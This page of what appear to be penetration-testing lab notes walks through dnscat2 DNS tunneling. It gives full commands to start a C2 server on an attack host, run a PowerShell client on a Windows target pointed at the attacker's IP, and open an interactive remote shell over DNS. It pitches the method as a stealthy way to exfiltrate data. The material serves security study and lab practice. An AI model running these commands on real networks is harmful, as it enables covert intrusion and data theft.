Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

DNS Tunneling with Dnscat2

Dnscat2 is a tunneling tool that uses the DNS protocol to send data between two hosts. It uses an encrypted Command-and-Control (C2) channel and sends data inside TXT records within the DNS protocol.

How It Works

In a typical corporate Active Directory environment, a local DNS server resolves hostnames to IP addresses and routes traffic to external DNS servers. With dnscat2, address resolution is requested from an external server controlled by the attacker. When the local DNS server tries to resolve an address, data is exfiltrated over the network instead of a legitimate DNS request being made.

This makes dnscat2 an extremely stealthy approach to data exfiltration, as it can evade firewall detections that strip HTTPS connections and sniff traffic.

Setup

Server (Attack Host)

Clone and install dnscat2:

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
sudo gem install bundler
sudo bundle install

Start the dnscat2 server:

sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

The server will output a secret key needed to authenticate and encrypt the client connection:

./dnscat --secret=0ec04a91cd1e963f8c03ca499d589d21 inlanefreight.local

Client (Target Host)

For Windows targets, use the dnscat2-powershell client.

Clone it on the attack host, then transfer dnscat2.ps1 to the target:

git clone https://github.com/lukebaggett/dnscat2-powershell.git

On the target, import and run the client:

Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd

The -PreSharedSecret must match the secret generated by the server to establish an encrypted session.

Usage

Once a session is established, the server will confirm:

Session 1 Security: ENCRYPTED AND VERIFIED!

Available Commands

dnscat2> ?
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows

Interacting with a Session

dnscat2> window -i 1

This drops into the established session, giving you an interactive shell on the target. Use ctrl-z to return to the dnscat2 prompt.